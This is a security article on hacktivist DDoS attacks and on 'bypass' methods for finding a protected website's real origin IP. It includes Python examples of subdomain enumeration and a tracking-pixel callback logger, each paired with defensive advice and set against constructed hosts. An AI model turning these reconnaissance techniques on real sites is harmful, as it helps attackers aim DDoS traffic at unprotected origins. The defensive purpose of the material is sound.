Attacks by cybercriminals on the websites of US airports and the White House, Anonymous attacks on Russian media sites, DDoS campaigns: all of this is only a small part of what is going on in the cybercriminal underground today.
Why do they do it?
At first glance, hacktivist attacks may look like pure social protest: halting the work of the largest corporations and silencing various information resources. Underneath, however, the goal is financial, and under the cover of organizing such attacks hacktivists engage in plain fraud. Everything revolves around money, and it would be naive to think that hacktivists act out of altruism. Organizing any DDoS attack costs real money; even renting a botnet requires a substantial payment.
One such demonstrative attack hit the infrastructure of Latvia's national health service and its e-health system. At first it resembled ordinary hacktivist activity, but then the operators of a large botnet joined in, and at that stage the Latvian healthcare system could not hold up and was out of service for several hours.
How monetization works
Hacktivists have two main ways to make money. The first is donations: attacks are announced in various social media channels, together with a fundraiser to support the "cyber activists".
The second is self-promotion. Once everyone knows you are "the top DDoSer around", people start coming to you with commercial orders for attacks.
What is the damage?
However loud the ongoing attacks sound, in practice hacktivists can do little real harm to a business. As a rule, the attacks they organize come down to basic-level DDoS, which everyone has long since learned to handle, especially over the past six months.
That said, the effect of a well-placed DDoS attack is hard to overestimate. Attacks on the largest domain registrars, electronic signature verification centres, tax authorities, payment systems, medical systems and telemetry solutions, carried out in a "shock and awe" format, would have a bombshell effect. It would be felt most in geographically large countries such as China or India if a DDoS attack broke their national connectivity. In theory such scenarios are entirely possible; in practice, the current level of DDoS looks more like schoolchildren trying to show off more than they actually know how to do.
Bypass in action
Over the past six months almost everyone has learned to cope with hacktivist attacks and has realized that DNS, mail services and the like need protecting as well.
The attackers' task is therefore to discover the real IP address of the origin behind the portal and to "pour" malicious traffic straight at it, bypassing the DDoS protection.
Another technique attackers use successfully to organize a bypass is DNS fuzzing. People name their services and domain zones predictably, and attackers exploit this by enumerating hostnames in the attacked resource's zone (test-, dev-, old-, mail-, api- and similar) in an attempt to find "live" services that still sit on the victim's own infrastructure.
That is why care is needed when adding and publishing a new service: its DNS record must point to the protection provider's IP address from the very first publication, or, when an existing service is placed behind protection, the origin IP must be changed, because the previously allocated address stays in DNS caches and passive-DNS history. A periodic audit of the domain zone to check where each record "looks" also helps to avoid such trouble.
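To make both sides of this concrete, here is an added example (not code from the original article or from any protection provider) that shows the attacker's predictable-name enumeration and the defender's zone audit side by side. Everything in it is constructed: `example.test` and its records, the provider prefixes `203.0.113.0/24` and `2001:db8:1::/48`, and the wordlist. The `resolve` callable is a stand-in dictionary lookup so the script runs offline; in real use you would pass a function that does an actual A/AAAA lookup (for example via `socket.getaddrinfo` or `dns.resolver`).

```python
"""Predictable-hostname enumeration and a zone audit against a DDoS-protection provider's prefixes.

Added example: all names, addresses and prefixes are constructed, not real infrastructure.
"""
import ipaddress
from itertools import product

# Constructed: address space announced by the (hypothetical) protection provider.
PROTECTION_PREFIXES = [
    ipaddress.ip_network("203.0.113.0/24"),
    ipaddress.ip_network("2001:db8:1::/48"),
]

# Constructed stand-in for live DNS: hostname -> A/AAAA records.
# The apex and www sit behind the provider; three forgotten names still point at origin hosts.
CONSTRUCTED_ZONE = {
    "example.test": ["203.0.113.10"],
    "www.example.test": ["203.0.113.10"],
    "cdn.example.test": ["2001:db8:1::5"],
    "mail.example.test": ["198.51.100.25"],
    "staging.example.test": ["198.51.100.7"],
    "api-old.example.test": ["198.51.100.7"],
}

# Constructed wordlist of the naming habits the text describes.
WORDS = ["dev", "staging", "test", "old", "api", "mail", "vpn", "admin"]
SUFFIXES = ["", "-old", "-dev", "2"]


def candidate_names(base, words=WORDS, suffixes=SUFFIXES):
    """Build the predictable hostnames an attacker would try under `base`."""
    return [f"{w}{s}.{base}" for w, s in product(words, suffixes)]


def fuzz_zone(base, resolve, words=WORDS, suffixes=SUFFIXES):
    """Attacker's view: return every candidate that resolves, with its addresses.

    `resolve(name)` must return a list of address strings, or None/[] when the name does not exist.
    """
    found = {}
    for name in candidate_names(base, words, suffixes):
        addrs = resolve(name)
        if addrs:
            found[name] = list(addrs)
    return found


def is_protected(addr, prefixes=PROTECTION_PREFIXES):
    """True if `addr` lies inside one of the provider's prefixes (version mismatch is simply False)."""
    ip = ipaddress.ip_address(addr)
    return any(ip in net for net in prefixes)


def audit_zone(records, prefixes=PROTECTION_PREFIXES):
    """Defender's view: map each name to the addresses that bypass the provider (empty if clean)."""
    leaks = {}
    for name, addrs in records.items():
        exposed = [a for a in addrs if not is_protected(a, prefixes)]
        if exposed:
            leaks[name] = exposed
    return leaks


if __name__ == "__main__":
    print("attacker finds:", fuzz_zone("example.test", CONSTRUCTED_ZONE.get))
    print("audit flags  :", audit_zone(CONSTRUCTED_ZONE))
```

Run the audit on every published zone, not only the one carrying the main portal, and treat any flagged record as an origin leak: either move the service behind the provider, or retire the name and renumber the host, since the old address will already be in caches and passive-DNS history.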
Another example is any service that makes a callback from the protected client's infrastructure. These can be two-way protocols or downloadable pictures: the attacker submits an object that embeds an image, and the infrastructure connects out to fetch it. That outgoing connection comes from the victim's real address, so the origin IP is revealed.
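The callback leak, as an added example that is not part of the original article: an attacker-side listener that serves a pixel image and records the peer address of whatever fetches it, and a stand-in for the protected application's server-side fetch. In a real attack the listener runs on an attacker host and the fetch runs on the origin server, so the recorded address is the origin IP rather than the protection provider's; here both sides run on loopback so the script is self-contained. The path `/track.gif`, the `run_demo` helper and the GIF bytes are constructed for the demonstration.

```python
"""Callback-based origin disclosure: an attacker-hosted image logs who fetches it.

Added example; the listener, the victim fetch and the payload are all constructed.
"""
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.request import urlopen

# Constructed payload: a 1x1 GIF, so the fetch looks like an ordinary image download.
PIXEL = (
    b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
    b"!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;"
)


class CallbackLogger(BaseHTTPRequestHandler):
    """Attacker's listener: record (peer_ip, path, user_agent) for every request, then serve the pixel."""

    seen = []  # shared log of observed callbacks

    def do_GET(self):
        CallbackLogger.seen.append(
            (self.client_address[0], self.path, self.headers.get("User-Agent", ""))
        )
        self.send_response(200)
        self.send_header("Content-Type", "image/gif")
        self.send_header("Content-Length", str(len(PIXEL)))
        self.end_headers()
        self.wfile.write(PIXEL)

    def log_message(self, *args):
        pass  # keep the default stderr access log quiet


def start_listener(host="127.0.0.1", port=0):
    """Bind the listener (port 0 = any free port) and serve it on a background thread."""
    srv = HTTPServer((host, port), CallbackLogger)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def victim_fetch(url):
    """Stand-in for the protected app fetching a user-supplied image (avatar URL, <img> in a message).

    In production this runs on the origin host, so the connection exposes the origin's address.
    """
    with urlopen(url, timeout=5) as resp:
        return resp.read()


def run_demo():
    """Attacker submits an object embedding the image URL; victim fetches it; attacker reads the log."""
    srv = start_listener()
    port = srv.server_address[1]
    CallbackLogger.seen.clear()
    try:
        body = victim_fetch(f"http://127.0.0.1:{port}/track.gif?submission=42")
    finally:
        srv.shutdown()
        srv.server_close()
    return list(CallbackLogger.seen), body


if __name__ == "__main__":
    callbacks, _ = run_demo()
    for peer, path, agent in callbacks:
        print(f"callback from {peer} for {path} ({agent!r})")
```

The defensive consequence follows directly: any server-side fetch of attacker-influenced URLs must leave the network from an address that is not the origin (a dedicated egress proxy or NAT address), or be disabled, because the attacker only needs one such request to learn where to aim.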
Who is to blame and what to do?
Ultimately, a bypass is an attempt to get around the protection provider and hit the resource directly. As described above, it is carried out in different ways, but if the business has defended itself well and closed every loose end, there is nothing to fear.
If loose ends do remain, or a business needs extra confidence in the uninterrupted operation of its service, a dedicated protected channel can be set up from the provider's edge to the client's infrastructure. Then, even if the main channel to the client was "punched through" because something was not fully closed off, traffic flows over the dedicated one and the business stays online around the clock.
Bypass prevention is a task the security provider always solves together with the client, and it is a recurring task with constantly changing inputs. Any new microservice published to the Web in the client's infrastructure, any newly issued TLS certificate, any record added to a domain zone, any file uploaded for download can potentially reveal an entry point to an attacker.
To sum up: bypass is, on the whole, not as frightening as it is painted. For a protection provider it is one more challenge, and the more attacks the anti-DDoS system neutralizes, the more it gets to learn from them, and the less likely a bypass of a protected client becomes.